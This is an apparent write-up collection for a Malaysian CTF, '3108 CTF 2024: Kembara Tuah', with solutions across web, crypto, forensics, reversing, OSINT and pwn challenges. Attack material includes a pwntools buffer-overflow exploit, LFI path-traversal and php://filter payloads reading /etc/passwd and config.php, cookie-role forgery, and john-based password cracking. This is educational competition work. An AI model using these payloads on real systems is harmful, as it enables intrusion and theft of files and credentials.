3108 CTF 2024 : Kembara Tuah
Trivia Khas Penaja Platinum
RawSEC
Some googling will give you answers.
FLAG: 3108{REMBULAN_UCTATI}
Yayasan Digital Malaysia
FLAG: 3108{jom.digital.by.ydm}
MALAYSIA
3108
FLAG: Ya
Cordini (Misc)
Join the discord server
Go to get-role channel
Click the “purple alien”
Another channel will appear. There is our flag.
FLAG: 3108{kibarkanlah_jalur_gemilang}
Maklum Balas
FLAG: 3108{MalaysiaMadaniJiwaMerdeka}
Kelantan
Sultan Yang Hilang (Web)
Access the URL. We got a list of Sultan Kelantan
View Source, we get a path to "year". /api/v1/sultan/
Silly me, i tried one by one of the year. 1889 got out flag.
https://f2add8dd3a.bahterasiber.my/api/v1/sultan/1889
FLAG: 3108{putera_sulong_Sultan_Ahmad}
Tanpa Nama (RE)
Hint: Modify the opcode
Hint 2: Break @main
array1 = [
0x65527b88, 0xba80759c, 0xe7aa9e95, 0xe5c7fec2,
0x8cc5a5de, 0x8f98a784, 0x326e7852, 0x5c844e3f,
0x8885bd6d, 0xa194
]
array2 = [
0x2c21160b, 0x584d4237, 0x84796e63, 0x848f9a8f,
0x58636e79, 0x2c37424d, 0xb1621, 0x2c21160b,
0x584d4237, 0x6e63
]
result = []
for i in range(len(array1)):
for j in range(4):
byte1 = (array1[i] >> (8 * j)) & 0xFF
byte2 = (array2[i] >> (8 * j)) & 0xFF
result_byte = (byte1 - byte2) & 0xFF
result.append(result_byte)
result.reverse()
flag = ''.join(chr(b) for b in result if b != 0)
print(flag)
FLAG: 3108{60c842cb1cae74b7ea8d3c102b33e91e}
Ps: I forgot from where, but this is solution from someone else. I just put it here together for everyone to read and learn. Thank you to the person 👏
Tanpa Nama 2 (RE) ❌
Hint: Check for a reocurring pattern
Hint 2: modify the opcode to the average pattern
FLAG:
No Solution Yet
TERRENGGANU
Privacy matters (Osint)
Tiktok ID: @rockey_smokey1337
Search the ID in Tiktok
Go through some post.
Lead to
p3tualangpost.Then, we see comment from
rockey_smokey1337about IG post
Head to IG, and we see a crop photo of or flag... and #kbbsteak.
Tried google on this, lead to Google Review post of our full photo contain our flag.
FLAG: 3108{J4g4_pr1v4cy_4nd4}
Ngaji (Forensic)
Hint: Magic Header
Hint 2: "Tuan Hamba perlu 'dengar', bukan lihat.”
What does it mean by “dengar”? Header? is it not jpeg file? Lets check on it.
Hexeditor Online: https://hexed.it/
After some time searching
fmt - related to wav file. So lets change the header
Header: 52 49 46 8E E3 94 00 57 41 56 45
Now, lets open in Audacity.
Audacity Online: https://wavacity.com/
After hearing to the song, we did hear something. So now lets use spectogram
FLAG: 3108{iLmu_P3n7ing}
Tulisan Jawi (Binary + Linux)
from pwn import *
p = remote('103.28.91.24',10005)
elf = ELF("./jawi")
offset = 40
flag_addr = elf.sym["flag"]
payload = b'A'*offset
payload += p64(0x0000000000401016)
payload += p64(flag_addr)
p.sendline(payload)
p.interactive()
FLAG: 3108{b4tu_b3rsur4t}
Reference:
Ps: Thank you to n3r for the solution sharing.
PAHANG
Sembunyi (Misc)
Attached: rahsia.txt
We got a txt file with whitespace. Just decode it.
Dcode: https://www.dcode.fr/whitespace-language
FLAG: 3108{S3jarah_Ters3mbunyi_P4hang}
Seri Gumum (Web)❌
/sejarah?tempat=rompin
/sejarah?tempat=kuantan
/sejarah?tempat=bera
Then, we tried LFI. ../../../../etc/passwd
No Solution Yet
Tinggi Mat (Forensik)
Attached: WMT.rar
We check for metadata
zsteg WarisanMerdekaTower.png
So, we got half flag… 3108{th3_t4ll3st
I believe this the password for flag2.rar
Password: MERDEKA118
Decode using Unicode Stega
Unicode: https://330k.github.io/misc_tools/unicode_steganography.html
Thats our another half. _0n3_1n_M4l4ys14!}
FLAG: 3108{th3_t4ll3st_0n3_1n_M4l4ys14!}
Tinggi lagii (Forensik)
Attached: BAngunan.jpg
Make some googling.Google Image
I found Its name is Tradewinds Square Tower
So search about this building led to this information
This building site.
The coordinate
FLAG: 3108{3.15, 101.71}
Merdeka (Web)
Lagu Merdeka
Intercept using Burp Suite.
Then we can see it is using base64. try to decode to confirm.
decode base64 shows the page name.
So now i try encode ../../../../../etc/passwd
Put it in cookie.
Successfully read.
Now, I tried to read php file. But I will use PHP filter php://
After some guessing, we got the right path.
php://filter/read=convert.base64-encode/resource=/var/www/html/config.php
cGhwOi8vZmlsdGVyL3JlYWQ9Y29udmVydC5iYXNlNjQtZW5jb2RlL3Jlc291cmNlPS92YXIvd3d3L2h0bWwvY29uZmlnLnBocA==
FLAG: 3108{m4r1_k1t4_w4rg4_n3g4r4}
Reference:
Kesejarah Kemerdekaan (Network) ❌
No Solution Yet
SELANGOR
Mesej Rahsia (Crypto)
Attached: secretMessenger.py
a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z='j','b','a','c','m','n','i','p','o','q','r','t','x','z','v','s','u','y','h','g','d','e','f','k','l','w'
flag=((3108,"{",p,q,b,p,l,g,l,q,l,v,"_",d,g,h,s,v,k,"_",l,v,m,l,"}")[::-1])I add print to print the output.
# Variable assignments
a, b, c, d, e, f, g, h, i, j, k, l, m, n, o, p, q, r, s, t, u, v, w, x, y, z = \\
'j', 'b', 'a', 'c', 'm', 'n', 'i', 'p', 'o', 'q', 'r', 't', 'x', 'z', 'v', 's', 'u', 'y', 'h', 'g', 'd', 'e', 'f', 'k', 'l', 'w'
# Create the flag tuple and reverse it
flag = ((3108, "{", p, q, b, p, l, g, l, q, l, v, "_", d, g, h, s, v, k, "_", l, v, m, l, "}")[::-1])
# Convert the reversed tuple to a string and print it
flag_str = ''.join(map(str, flag))
print(flag_str)But the result seems to backwards.
So, i mend to not output in backwards
# Variable assignments
a, b, c, d, e, f, g, h, i, j, k, l, m, n, o, p, q, r, s, t, u, v, w, x, y, z = \\
'j', 'b', 'a', 'c', 'm', 'n', 'i', 'p', 'o', 'q', 'r', 't', 'x', 'z', 'v', 's', 'u', 'y', 'h', 'g', 'd', 'e', 'f', 'k', 'l', 'w'
# Create the flag tuple without reversing
flag = (3108, "{", p, q, b, p, l, g, l, q, l, v, "_", d, g, h, s, v, k, "_", l, v, m, l, "}")
# Convert the tuple to a string and print it
flag_str = ''.join(map(str, flag))
print(flag_str)
FLAG: 3108{substitute_cipher_text}
Tanpa Nama 3 (Crypto)
Attached: cryptochalle.py
Repair the code:
def xor_with_binary(binary_str, xor_str):
binaries = binary_str.split()
xor_num = int(xor_str, 2)
xor_results = []
for b in binaries:
num = int(b, 2)
result_num = num ^ xor_num
xor_results.append(format(result_num, '08b'))
return ' '.join(xor_results)
def binary_to_text(binary_str):
binaries = binary_str.split()
text = ''.join([chr(int(b, 2)) for b in binaries])
return text
binary_str = "01010110 01010100 01010101 01011101 00011110 00110110 01010100 00101000 00110101 00101001 01010110 00111010 00100110 00110111 00110101 00111100 00110001 01010101 00111010 00100110 00101101 00100100 00101001 00101001 00100000 00101011 00100010 00100000 00011000"
xor_str = "01100101"
# Perform XOR and convert to text
xor_output = xor_with_binary(binary_str, xor_str)
decoded_text = binary_to_text(xor_output)
# Output the decoded text
print("Decoded text:", decoded_text)
FLAG: 3108{S1MPL3_CRPYT0_CHALLENGE}
Selangorku (Web)
We curl the url
curl https://6654c734cc.bahterasiber.my/
#!/bin/bash
# Base URL
base_url="<https://6654c734cc.bahterasiber.my>"
# List of paths
paths=(
"/hulu_langat.html"
"/klang.html"
"/kuala_langat.html"
"/kuala_selangor.html"
"/petaling.html"
"/sabak_bernam.html"
"/sepang.html"
"/gombak.html"
"/hulu_selangor.html"
)
# Loop through each path and make a curl request
for path in "${paths[@]}"; do
# Fetch the URL, filter for "3108", remove spaces and newlines
curl -s "${base_url}${path}" | grep "3108" | tr -d '[:space:]'
donechmod + x selangorku.sh
./selangorku.sh
FLAG: 3108{S3lang0r_temp4t_kelahiran_ku}
Selangorku V2 (Web)
https://1b267619c4.bahterasiber.my/
Same as Selangorku. But this time it got more when you curl into /hulu_langat/ and all the “tempat”
#!/bin/bash
# Base URL
base_url="<https://1b267619c4.bahterasiber.my>"
# List of paths (directories)
paths=(
"/hulu_langat/"
"/klang/"
"/kuala_langat/"
"/petaling/"
"/kuala_selangor/"
"/sabak_bernam/"
"/sepang/"
"/gombak/"
"/hulu_selangor/"
)
# Loop through each path
for path in "${paths[@]}"; do
# Fetch the content of the directory or index page
content=$(curl -s "${base_url}${path}")
# Extract all .html links
html_links=$(echo "$content" | grep -oP '(?<=href=")[^"]+\\.html')
# Loop through each .html link found
for link in $html_links; do
# Construct the full URL
full_url="${base_url}${path}${link}"
# Curl the full URL and search for the pattern "3108{flag}"
result=$(curl -s "$full_url" | grep -oP "3108{[^}]+}")
# If the pattern is found, print the result
if [[ -n "$result" ]]; then
echo "Result"
echo "Path: $full_url"
echo "Flag: $result"
fi
done
done
FLAG: 3108{D1_s1ni_t3mp4t_S4ya_m3mb3s4r}
Selangor Tourism (Reversing) ❌
Hint 1: Namakan semula file
Hint 2: pestudio
No Solution Yet
Arkib Digital (Web)
https://d9e9c0bd29.bahterasiber.my
Hint: ada yang tersembunyi di dalam arkib
We found script.js in view source
“arkib” word is the hint.
/arkib.php will get this in response. Together with Base64.
Decode the based64 in Decoder.
FLAG: 3018{f1b1d922b8af1b7187b9a8f68b888ac44b6f9182269e74cb56fd3e92d9a714f5}
Pintu gerbang (Web) ❌
https://4219844b4c.bahterasiber.my
Found script.js in view-source
var _0x5deaf3=_0x4390;(function(_0x3ec5ae,_0x971b41){var _0x383ab5=_0x4390,_0x186466=_0x3ec5ae();while(!![]){try{var _0x49850d=-parseInt(_0x383ab5(0xff))/0x1+-parseInt(_0x383ab5(0xf0))/0x2+parseInt(_0x383ab5(0xf2))/0x3*(-parseInt(_0x383ab5(0xf9))/0x4)+-parseInt(_0x383ab5(0xf1))/0x5+parseInt(_0x383ab5(0xf6))/0x6+-parseInt(_0x383ab5(0xf7))/0x7+parseInt(_0x383ab5(0xe5))/0x8*(parseInt(_0x383ab5(0xeb))/0x9);if(_0x49850d===_0x971b41)break;else _0x186466['push'](_0x186466['shift']());}catch(_0x2ccc1e){_0x186466['push'](_0x186466['shift']());}}}(_0x3155,0x22b59));function getSessionPath(){var _0x83474e=_0x4390;return _0x83474e(0xf5);}function getGateKey(){var _0x2ffb13=_0x4390,_0x2b91fb=new XMLHttpRequest();_0x2b91fb['open'](_0x2ffb13(0xe7),_0x2ffb13(0xf4),!![]),_0x2b91fb[_0x2ffb13(0xfc)](_0x2ffb13(0xe6),'application/x-www-form-urlencoded'),_0x2b91fb[_0x2ffb13(0xe8)]=function(){var _0x215b46=_0x2ffb13;_0x2b91fb[_0x215b46(0xec)]!==0xc8&&console['log'](_0x215b46(0xfd));},_0x2b91fb['send']();}function computeHash(_0xb75b35){var _0x42d35e=_0x4390,_0x1220c3=0x0;for(var _0x2b6c7e=0x0;_0x2b6c7e<_0xb75b35[_0x42d35e(0x102)];_0x2b6c7e++){_0x1220c3+=_0xb75b35[_0x42d35e(0xfe)](_0x2b6c7e)*0x3%0x100;}return console['log'](_0x42d35e(0xe9),_0x1220c3),_0x1220c3;}function simulateDelay(_0x40a570){setTimeout(function(){var _0x54f190=_0x4390;console[_0x54f190(0xf8)](_0x54f190(0xfa)),typeof _0x40a570==='function'&&_0x40a570();},0x5dc);}function generateRandomData(_0x47dd6b){var _0x59fd4a=_0x4390,_0x19f7a7=[];for(var _0x3607e4=0x0;_0x3607e4<_0x47dd6b;_0x3607e4++){_0x19f7a7[_0x59fd4a(0x101)](Math[_0x59fd4a(0xef)](_0x3607e4)*0x64);}return console[_0x59fd4a(0xf8)]('Generated\\x20Data:',_0x19f7a7),_0x19f7a7;}function calculateSquare(_0x43e352){var _0x23551f=Math['pow'](_0x43e352,0x2);return console['log']('Calculated\\x20Square:',_0x23551f),_0x23551f;}function obfuscateString(_0x4bbcb7){var _0x7ea55a=_0x4390,_0x184307=_0x4bbcb7[_0x7ea55a(0x100)]('')['reverse']()[_0x7ea55a(0xee)]('');return console[_0x7ea55a(0xf8)](_0x7ea55a(0xfb),_0x184307),_0x184307;}computeHash(_0x5deaf3(0xf3)),simulateDelay(function(){var _0x327c0a=_0x5deaf3;console['log'](_0x327c0a(0xea));}),generateRandomData(0xf),calculateSquare(0xa),obfuscateString('complexity'),getGateKey();function _0x3155(){var _0x16552d=['length','16JOQhzV','Content-Type','POST','onload','Computed\\x20Hash:','Callback\\x20from\\x20simulateDelay','1783962WUGaRA','status','shift','join','sin','161348jmqDPA','30560mOkTJY','261FVoBpD','exampleInput','/maklumat_kunci.php','/s3N4r4I_kunc1.txt','1276416ZfCPdV','1413755luiuCd','log','3564MyKJfp','Delay\\x20Simulation\\x20Completed','Obfuscated\\x20String:','setRequestHeader','Kunci\\x20tidak\\x20disediakan\\x20atau\\x20tidak\\x20sah!','charCodeAt','100735IwYsIA','split','push'];_0x3155=function(){return _0x16552d;};return _0x3155();}function _0x4390(_0x53a517,_0x524d79){var _0x31558c=_0x3155();return _0x4390=function(_0x43906c,_0x5a0f21){_0x43906c=_0x43906c-0xe5;var _0x43d2e2=_0x31558c[_0x43906c];return _0x43d2e2;},_0x4390(_0x53a517,_0x524d79);}function getCookie(_0x322a62){var _0x27961c=_0x5deaf3,_0x59fc67=';\\x20'+document['cookie'],_0x16c81d=_0x59fc67[_0x27961c(0x100)](';\\x20'+_0x322a62+'=');if(_0x16c81d[_0x27961c(0x102)]==0x2)return _0x16c81d['pop']()['split'](';')[_0x27961c(0xed)]();}Do some cleaning
function getSessionPath() {
return '/s3N4r4I_kunc1.txt';
}
function getGateKey() {
var xhr = new XMLHttpRequest();
xhr.open('POST', '/maklumat_kunci.php', true);
xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
xhr.onload = function() {
if (xhr.status !== 200) console.log('Kunci tidak disediakan atau tidak sah!');
};
xhr.send();
}
function computeHash(str) {
var hash = 0;
for (var i = 0; i < str.length; i++) {
hash += str.charCodeAt(i) * 3 % 256;
}
console.log('Computed Hash:', hash);
return hash;
}
function simulateDelay(callback) {
setTimeout(function() {
console.log('Delay Simulation Completed');
if (typeof callback === 'function') callback();
}, 1500);
}
function generateRandomData(length) {
var data = [];
for (var i = 0; i < length; i++) {
data.push(Math.sin(i) * 100);
}
console.log('Generated Data:', data);
return data;
}
function calculateSquare(num) {
var square = Math.pow(num, 2);
console.log('Calculated Square:', square);
return square;
}
function obfuscateString(str) {
var obfuscated = str.split('').reverse().join('');
console.log('Obfuscated String:', obfuscated);
return obfuscated;
}
computeHash(getSessionPath());
simulateDelay(function() {
console.log('Callback from simulateDelay');
});
generateRandomData(15);
calculateSquare(10);
obfuscateString('complexity');
getGateKey();
/s3N4r4I_kunc1.txt
kunci=a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6 kunci=b5a1d2e3c4f6e7a8b9c0d1e2f3a4b5c6 kunci=c1d2e3f4a5b6c7d8e9f0a1b2c3d4e5f6 kunci=d2e3f4a5b6c7d8e9f0a1b2c3d4e5f6a7 kunci=e3f4a5b6c7d8e9f0a1b2c3d4e5f6a7b8 kunci=f4a5b6c7d8e9f0a1b2c3d4e5f6a7b8c9 kunci=a5b6c7d8e9f0a1b2c3d4e5f6a7b8c9d0 kunci=b6c7d8e9f0a1b2c3d4e5f6a7b8c9d0e1 kunci=c7d8e9f0a1b2c3d4e5f6a7b8c9d0e1f2 kunci=d8e9f0a1b2c3d4e5f6a7b8c9d0e1f2a3 kunci=e9f0a1b2c3d4e5f6a7b8c9d0e1f2a3b4 kunci=f0a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5 kunci=a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6 kunci=b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7 kunci=c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8 kunci=d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9 kunci=e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0 kunci=f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1 kunci=a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1d2 kunci=b8c9d0e1f2a3b4c5d6e7f8a9b0c1d2e3 kunci=c9d0e1f2a3b4c5d6e7f8a9b0c1d2e3f4 kunci=d0e1f2a3b4c5d6e7f8a9b0c1d2e3f4a5 kunci=e1f2a3b4c5d6e7f8a9b0c1d2e3f4a5b6 kunci=f2a3b4c5d6e7f8a9b0c1d2e3f4a5b6c7 kunci=a3b4c5d6e7f8a9b0c1d2e3f4a5b6c7d8 kunci=b4c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9 kunci=c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0 kunci=d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0a1 kunci=e7f8a9b0c1d2e3f4a5b6c7d8e9f0a1b2 kunci=f8a9b0c1d2e3f4a5b6c7d8e9f0a1b2c3 kunci=a9b0c1d2e3f4a5b6c7d8e9f0a1b2c3d4 kunci=b0c1d2e3f4a5b6c7d8e9f0a1b2c3d4e5 kunci=a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6 kunci=b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7 kunci=c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8 kunci=d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9 kunci=e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0 kunci=f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1 kunci=a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1d2 kunci=b8c9d0e1f2a3b4c5d6e7f8a9b0c1d2e3 kunci=c9d0e1f2a3b4c5d6e7f8a9b0c1d2e3f4 kunci=d0e1f2a3b4c5d6e7f8a9b0c1d2e3f4a5 kunci=e1f2a3b4c5d6e7f8a9b0c1d2e3f4a5b6 kunci=f2a3b4c5d6e7f8a9b0c1d2e3f4a5b6c7 kunci=a3b4c5d6e7f8a9b0c1d2e3f4a5b6c7d8 kunci=b4c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9 kunci=c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0 kunci=d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0a1 kunci=7c2d6e8a1b1c8e4e6f1b5a5e1a2c8b7d kunci=e3f4a5b6c7d8e9f0a1b2c3d4e5f6a7b8 kunci=f4a5b6c7d8e9f0a1b2c3d4e5f6a7b8c9 kunci=a5b6c7d8e9f0a1b2c3d4e5f6a7b8c9d0 kunci=b6c7d8e9f0a1b2c3d4e5f6a7b8c9d0e1 kunci=c7d8e9f0a1b2c3d4e5f6a7b8c9d0e1f2 kunci=d8e9f0a1b2c3d4e5f6a7b8c9d0e1f2a3 kunci=d0e1f2a3b4c5d6e7f8a9b0c1d2e3f4a5 kunci=e1f2a3b4c5d6e7f8a9b0c1d2e3f4a5b6 kunci=f2a3b4c5d6e7f8a9b0c1d2e3f4a5b6c7 kunci=a3b4c5d6e7f8a9b0c1d2e3f4a5b6c7d8 kunci=b4c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9 kunci=b4c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9 kunci=c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0 kunci=d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0a1 kunci=e7f8a9b0c1d2e3f4a5b6c7d8e9f0a1b2 kunci=f8a9b0c1d2e3f4a5b6c7d8e9f0a1b2c3 kunci=a9b0c1d2e3f4a5b6c7d8e9f0a1b2c3d4 kunci=a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6
/maklumat_kunci.php
No Solution Yet
NEGERI SEMBILAN
Jauh Bono Umohnyo (Misc)
777 33 6 22 2 88_6 666 7777 8_9 2 66 8 33 3
Look like phone keypad.
FLAG: 3108{REMBAU_MOST_WANTED}
Sejarah N9 (Crypto + Misc)
2097119120211115191514712116114
FLAG: 3108{TIGASATUKOSONGLAPAN}
Sambungan Telefon (Misc)
741456369 321478963 1478965456321 258 7415963 36987 7412369654 7415963 321478965 741456369 321478963 1478965456321 258 7415963
Lets use Cipher Identifier in Dcode. Its detect as Numeric Keypad Draw
Cipher Identifier: https://www.dcode.fr/cipher-identifier
Numeric Keypad Draw: https://www.dcode.fr/numeric-keypad-draw
FLAG: 3108{HOBINJANGHOBIN}
MELAKA
Perigi (Osint)
Attached: flag.rar
We do some googling and found
Perigi Hang Li Po
Racun second time by Belanda
Reference: https://www.melakahariini.my/perigi-lambang-cinta-raja/
I use Belanda as a password to open the flag.rar
unrar e flag.rar
FLAG: 3108{th3_k1ngs_w3ll_st4ys_0n}
Pahlawan Lagenda (Forensic)
FLAG: 3108{gr3p_15_@w3s0m3_l4ks4m4n4}
Hang Tak Tidur Lagi (Web)
https://fc9044a5b6.bahterasiber.my/
View Source and we found this:
tuah:tuah
Hm..
The hint “Pembesar empat lain”
Bendahara, Penghulu Bendahari, Temenggung dan Laksamana.
We see above pic the “Laksamana” is highlighted.
We also see that there is cookie “role”
Decode: JRAUWU2BJVAU4QI%3D
URL Decode —> Base 32 we got Laksamana.
Now lets try do the same for another 3 Pembesar
Bendahara - IJSW4ZDBNBQXEYI%3D
Temenggung - KRSW2ZLOM5TXK3TH
Penghulu Bendahari - KBSW4Z3IOVWHKICCMVXGIYLIMFZGS%3D%3D%3D
FLAG: 3108{1d0R_s4nGa7l4h_Bah4y4!}
Ilmu Hisab (RE) ❌
Attached: perhintungan
No Solution Yet
Car Fire (Crypto) ❌
Attached: 5.png
No Solution Yet
Berenang Ke Tepian (RE) ❌
No Solution Yet
JOHOR
zZzZz (Web + Crypto)
Decode
0x33z0x31z0x30z0x380x7bz0x37z0x30z0x30z0x650x66z0x34z0x61z0x37z0x39z0x39z0x350x39z0x360x31z0x350x62z0x360x37z0x650x61z0x35z0x32z0x39z0x37z0x65z0x37z0x32z0x350x63z0x300x36z0x65z0x7dz
FLAG: 3108{700ef4a79959615b67ea5297e725c06e}
Kekacauan Huruf (Crypto)
I just ask ChatGPT to decode this. Here is the provided script.
from Crypto.Util.number import bytes_to_long, long_to_bytes
# Given values from secret_key.txt
secret_key = [54, 38, 12, 47, 37, 37, 53, 22, 6, 38, 62, 22, 10, 54, 19, 41, 43, 53, 0, 62, 63, 28, 63, 63, 22, 10, 7, 37, 63, 53, 44, 8, 10, 42, 35, 43, 42, 63, 37, 21, 4, 19, 45, 21, 19, 18, 3, 62, 53, 24, 2, 62, 18, 35, 41, 14, 53, 3, 37, 63, 55, 62, 5]
offset = 50
padding_length = 9
original_order = [9, 20, 6, 12, 22, 38, 14, 24, 53, 52, 61, 29, 45, 11, 57, 44, 8, 46, 55, 59, 31, 2, 51, 43, 21, 27, 17, 40, 15, 58, 0, 26, 19, 36, 60, 28, 48, 39, 34, 50, 7, 16, 56, 30, 10, 49, 13, 3, 5, 42, 41, 47, 37, 4, 32, 33, 62, 1, 18, 23, 25, 35, 54]
q = 64
# Step 1: Reverse the offset addition
adjusted_secret_key = [(x - offset) % q for x in secret_key]
# Step 2: Reverse the shuffling
reordered_secret_key = [0] * len(adjusted_secret_key)
for i, index in enumerate(original_order):
reordered_secret_key[index] = adjusted_secret_key[i]
# Step 3: Convert to integer
flag_int = 0
for value in reversed(reordered_secret_key):
flag_int = (flag_int * q) + value
# Step 4: Remove padding
flag_int >>= (padding_length * 8)
# Step 5: Convert integer back to bytes
flag_bytes = long_to_bytes(flag_int)
print("Flag:", flag_bytes.decode())
FLAG: 3108{9546880676d3788377699aad794c5a44}
Malayan Union (OSINT)
Attached: malayanunion.jpeg
Scroll in the comment, we see some base64.
aHR0cHM6Ly91ZmlsZS5pby9jYmRvdzF2MQo=
We get another jpg file
So we repair using FF D8 FF for JPEG file.
Now the image can be open.
We do Google Image search. And found a place name
FLAG: 3108{Istana_Besar_Johor}
Kapla Harimau Selatan (Web)
This is the main page of the website.
View Page Source is revealing something.
By revealing the reveal.txt, We found base64 in the code.
We decode it.
Upon searching, we found words Gangganu.
Since the code is all about header. We make a custom header in burp.
I add this two as stated in reveal.txt
Origin:https://127.0.0.1 X-Custom-Header: Gangganu
And Send Request. Ta daa we get our flag in response.
or
curl -s -H "Origin: [<https://127.0.0.1>](<https://127.0.0.1/>)" -H "X-Custom-Header: Gangganu" <https://8303a1befe.bahterasiber.my/> | grep "3108"
FLAG: 3108{d941697cea9e3f34186780b68416961}
Perak
Kontras (Forensic)
Attached: Sejarah_Ringkas.pdf
FLAG: 3108{Peghak_Darul_ridzuAn}
Pandak Lam (Crypto)
I just decode the text with ROT13 and search for flag 3108
FLAG: 3108{k3b4ngk1tanp4hl4w4n}
Penang
Bawang (Web + Osint)
Open in Tor browser (because the hint is Bawang)
URL: http://tmdjl5kyfzimrsrkkjisxybwb7664epxizxfz6hbivkg6k4a3x2svrad.onion
View source to get the username & password
Username: bawang
Password: bWVtYmF3YW5namVrZWpl
Decode using cyber chef
Password: membawangjekeje
5°24'35.8"N 100°19'41.4"E 5°25'11.7"N 100°19'57.1"E 5°24'49.0"N 100°18'46.9"E
Search in google maps will take us to all the Mamak. Let read the Google Review.
There is our flag in Nasi Kandar Line Clear
FLAG: 3108{surrr_punya_tobat_jumpa}
Mamu Kasi Tau (Misc)
Attached: mamu_kasi_tau.mp3
Open in https://wavacity.com/ (online Audacity)
Reverse the audio.
or may use below script speech2text.py
import argparse
from pydub import AudioSegment
import speech_recognition as sr
import os
def convert_to_wav(input_file, output_file):
# Load the input audio file (MP3 or WAV) and convert it to WAV
audio = AudioSegment.from_file(input_file)
audio.export(output_file, format="wav")
def reverse_wav(input_file, output_file):
# Load the WAV file
audio = AudioSegment.from_wav(input_file)
# Reverse the audio
reversed_audio = audio.reverse()
# Save the reversed audio to a new file
reversed_audio.export(output_file, format="wav")
def convert_speech_to_text(wav_file, language='ms'):
recognizer = sr.Recognizer()
# Load the WAV file
with sr.AudioFile(wav_file) as source:
# Record the audio
audio_data = recognizer.record(source)
# Recognize speech using Google Web Speech API
try:
text = recognizer.recognize_google(audio_data, language=language)
return text
except sr.UnknownValueError:
return "Speech Recognition could not understand audio"
except sr.RequestError as e:
return f"Could not request results; {e}"
def main():
# Set up argument parser
parser = argparse.ArgumentParser(description="Reverse an audio file (WAV or MP3) and convert Malay speech to text.")
parser.add_argument('input_file', type=str, help="Path to the input audio file (WAV or MP3)")
args = parser.parse_args()
input_file = args.input_file
base_name, ext = os.path.splitext(input_file)
if ext.lower() not in ['.wav', '.mp3']:
print("Unsupported file format. Please provide a WAV or MP3 file.")
return
# Temporary WAV file for processing
temp_wav = base_name + '_temp.wav'
reversed_wav = base_name + '_reversed.wav'
# Convert MP3 to WAV if needed
if ext.lower() == '.mp3':
convert_to_wav(input_file, temp_wav)
else:
temp_wav = input_file
# Reverse the WAV file
try:
reverse_wav(temp_wav, reversed_wav)
except Exception as e:
print(f"Error reversing audio file: {e}")
return
# Convert the reversed WAV file to text with Malay language
text = convert_speech_to_text(reversed_wav, language='ms')
print("Transcribed Text:")
print(text)
# Clean up temporary files
if ext.lower() == '.mp3':
os.remove(temp_wav)
os.remove(reversed_wav)
if __name__ == "__main__":
main()
FLAG: 3108{peningtelinga}
Pangkalan (Network)
Open in Wireshark
Follow tcp for port 55663
go through till “Stream 13”
3108{mikealphalimabravoalphatangotango}
This is NATO Phonetic Alphabet. We take out only the first letter.
Reference: https://www.worldometers.info/languages/nato-phonetic-alphabet/
FLAG: 3108{malbatt}
Kedah
Wordle Bahasa Utaqa (Web)
FLAG: 3108{h4ng_m3m4ng_s3mp0i}
Langkawi Di Hati (Web)
I tried so many things. Till… i try the word “salah” as shown below when you gave all the password salah.
tidak betul
lagi
lagi lain kali
tidak tepat
Just do it like that. it will go next next next till it prompt the flag.
FLAG: 3108{k3t4hu1_p@ssw0rd_4nd4}
Perlis
Jalan Jalan Desa (Osint)
Attached: Syah_Vacation.jpg
FLAG: 3108{Muzium_Bersejarah_Perlis}
Syah Sesat (Crypto)
Key : AMPUKAMPUKBULAN
We decode using Vigenere Cipher and Reverse
FLAG: 3108{GAMBUS_BUDAYA_LAMA}
Sekaya (Web)
Hint: mungkin ada image sekaya di dalam webpage
3108:komeyuserbiasa
The hint make me find the image.
“sekaya di gambar adalah admin”
FLAG: 3108{Roti_SeKaya_Untuk_Kapa}
Sabah
Cer Cari (Linux)
the text file give us a lot of years.
Do some research on important dates for Sabah. Turn out it the year of Sabah Merdeka. 1963
cat CerCari | grep "1963"
FLAG: 3108{S4b4h_1963}
Asal Nama Sabah (RE)
You may refer to how he solve this challenge. Thank You for the solution. :)
FLAG: 3108{S4B4H_S4PP4H}
Lahad Datu (Forensic)
Hint: Jikalau jawapan anda tidak dapat disubmit, mungkin itu bukan jawapannya. Cuba lagi
Given a locked doc file.
office2john Lahad_Datu > hash
john --wordlist=rockyou.txt hash
Now, open the doc with the password. playboy
I did try submit the flag at below. But em wrong.. then i see something wrong.
the flag cant be read. and there is a word that are bold. why?
Text: 3108{0Y3R4E1_D4FF4E}
Key: JamalulKiramIII
Head to Cyber Chef
FLAG: 3108{0P3R4S1_D4UL4T}
Sarawak
Makanan Popular (Linux)
strings Makanan | grep "3108"
FLAG: 3108{L4KS4_S4R4W4K}
Sarawak Kita (RE)
Attached: Sarawak_KITA.doc.bin
file Sarawak_KITA.doc.bin 
oleid Sarawak_KITA.doc.bin 
We can see that the output showing contain VBA kan.
olevba Sarawak_KITA.doc.bin 
now, we try to decode base64 that we get from read the vba file.
base64 -d <<<"MwAxADAAOAB7AEsAdQBjAGgAMQBuAGcAXwAxAGIAdQBfAE4AMwBnADMAcgAxAF8AUwA0AHIANAB3ADQAawB9AA=="
FLAG: 3108{Kuch1ng_1bu_N3g3r1_S4r4w4k}
